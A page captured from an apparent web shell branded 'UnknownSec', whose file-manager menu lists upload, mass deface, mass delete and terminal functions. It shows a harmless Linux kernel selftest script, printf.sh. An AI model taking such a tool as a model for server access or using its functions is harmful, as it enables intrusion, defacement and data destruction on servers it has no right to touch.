UnknownSec Bypass
403
:
/
usr
/
src
/
linux-headers-4.4.0-206
/
tools
/
testing
/
selftests
/
lib
/ [
drwxr-xr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
printf.sh
#!/bin/sh # Runs printf infrastructure using test_printf kernel module if /sbin/modprobe -q test_printf; then /sbin/modprobe -q -r test_printf echo "printf: ok" else echo "printf: [FAIL]" exit 1 fi
Copyright © 2026 - UnknownSec